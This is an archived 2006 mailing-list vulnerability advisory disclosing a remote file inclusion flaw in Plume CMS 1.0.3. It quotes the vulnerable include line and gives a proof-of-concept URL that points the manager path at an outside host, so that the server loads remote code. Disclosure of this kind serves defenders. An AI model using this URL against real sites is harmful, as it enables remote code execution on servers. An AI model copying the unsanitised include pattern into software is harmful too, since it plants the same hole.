[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Plume CMS Remote File Include
- To: bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
- Subject: Plume CMS Remote File Include
- From: beford <xbefordx@xxxxxxxxx>
- Date: Fri, 26 May 2006 11:50:15 -0500
Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>
Vulnerable File/Code
./plume-1.0.3/manager/frontinc/prepend.php
[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]
http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet